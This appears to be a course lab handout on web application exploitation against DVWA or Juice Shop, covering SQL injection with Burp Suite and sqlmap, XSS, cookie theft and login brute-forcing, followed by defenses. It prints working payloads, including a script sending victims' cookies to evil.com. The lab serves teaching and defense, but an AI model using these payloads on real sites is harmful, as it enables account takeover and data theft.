🔥 Web Application Security & Exploitation Lab

1️⃣ Setting Up the Lab

Install the Necessary Tools

Burp Suite Community Edition → Download here
OWASP ZAP → Download here
SQLMap (Command-line tool, install via pip):
```
pip install sqlmap
```
Vulnerable Web Application (Choose One)
- DVWA (Damn Vulnerable Web App) → Install on a local VM (Apache + PHP).
- OWASP Juice Shop → Easy setup using Docker:
```
docker run -d -p 3000:3000 bkimminich/juice-shop
```

2️⃣ SQL Injection Attack

SQL Injection (SQLi) allows attackers to extract data from a database.

Step 1: Identify a Vulnerable Input Field

Open Burp Suite and turn on Intercept Mode.
Enter a username and password in a login form, then capture the request.
Modify the request with a simple SQLi payload:
```
' OR '1'='1' --
```
Forward the request and see if you get unauthorized access.

Step 2: Automate SQL Injection with SQLMap

Run SQLMap against a vulnerable parameter:

sqlmap -u "http://target.com/login.php?user=admin" --dbs

This command will extract database names if the input is vulnerable.

3️⃣ Cross-Site Scripting (XSS) Attack

XSS attacks allow injecting JavaScript into vulnerable web pages.

Step 1: Find a Comment or Search Field

In DVWA, go to the XSS (Stored) section.
Submit this script as a comment:
```
<script>alert('Hacked!');</script>
```
If vulnerable, every visitor will see the JavaScript alert box.

Step 2: Perform XSS via Burp Suite

Capture a search request in Burp Suite.
Modify the search query to inject:
```
<img src=x onerror=alert('XSS')>
```
If the input isn’t sanitized, the JavaScript executes in the victim’s browser.

4️⃣ Authentication Bypass Attack

Many websites store session tokens in cookies, which can be stolen.

Inject this script into a comment field:

<script>document.location='http://evil.com/steal.php?cookie='+document.cookie</script>

The attacker receives the victim’s authentication cookie.
Use the stolen cookie to log in as the victim.

Step 2: Test for Weak Authentication

Try default credentials (e.g., admin:admin or root:password).
If the site lacks rate limiting, use Burp Suite’s Intruder tool to brute-force login attempts.

🔐 Defensive Measures

After exploiting these vulnerabilities, we must understand how to prevent them.

✅ Preventing SQL Injection:

Use prepared statements in SQL queries.
Implement Web Application Firewalls (WAFs) to block malicious requests.

✅ Preventing XSS Attacks:

Always sanitize user inputs before storing them.
Use Content Security Policy (CSP) to restrict script execution.

✅ Preventing Authentication Attacks:

Implement Multi-Factor Authentication (MFA).
Store session tokens securely (HTTPOnly & Secure flags).

📌 Conclusion

This lab teaches you real-world penetration testing skills for web application security. By completing this, you’ve learned: ✅ How attackers exploit SQL injection and XSS vulnerabilities.
✅ How to manipulate web requests using Burp Suite.
✅ How to steal session tokens and bypass authentication.
✅ How to defend against web-based attacks.

📤 Submission Instructions

Submit screenshots or a detailed report explaining:
✅ How you exploited each vulnerability
✅ The impact of the attack
✅ Steps to mitigate the issue

🚀 Next Steps:

Try testing real-world bug bounty challenges at Hack The Box or PortSwigger’s Web Security Academy.

🔥 Web Application Security & Exploitation Lab#

1️⃣ Setting Up the Lab#

Install the Necessary Tools#

2️⃣ SQL Injection Attack#

Step 1: Identify a Vulnerable Input Field#

Step 2: Automate SQL Injection with SQLMap#

3️⃣ Cross-Site Scripting (XSS) Attack#

Step 1: Find a Comment or Search Field#

Step 2: Perform XSS via Burp Suite#

4️⃣ Authentication Bypass Attack#

Step 1: Steal a User’s Cookie#

Step 2: Test for Weak Authentication#

🔐 Defensive Measures#

📌 Conclusion#

📤 Submission Instructions#